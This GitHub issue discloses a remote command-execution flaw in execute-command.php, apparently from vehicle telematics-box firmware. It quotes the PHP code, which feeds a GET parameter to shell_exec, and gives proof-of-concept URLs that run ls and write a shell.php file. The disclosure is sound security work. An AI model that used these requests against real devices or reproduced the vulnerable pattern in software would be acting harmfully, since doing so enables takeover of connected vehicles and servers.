Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

execute-command.php Command execution vulnerability #1

Open
xiaoming-king opened this issue Feb 14, 2023 · 0 comments
Open

execute-command.php Command execution vulnerability #1

xiaoming-king opened this issue Feb 14, 2023 · 0 comments

Comments

@xiaoming-king
Copy link

xiaoming-king commented Feb 14, 2023

The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution

This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous
下载
下载

`<?php

$command = $_GET['command'];
$output = shell_exec($command);

echo $output;

?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer

Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output

POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php

Example:
http://192.168.160.128:7777/execute-command.php?command=ls
image

/execute-command.php?command=echo "" > shell.php
image
image
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant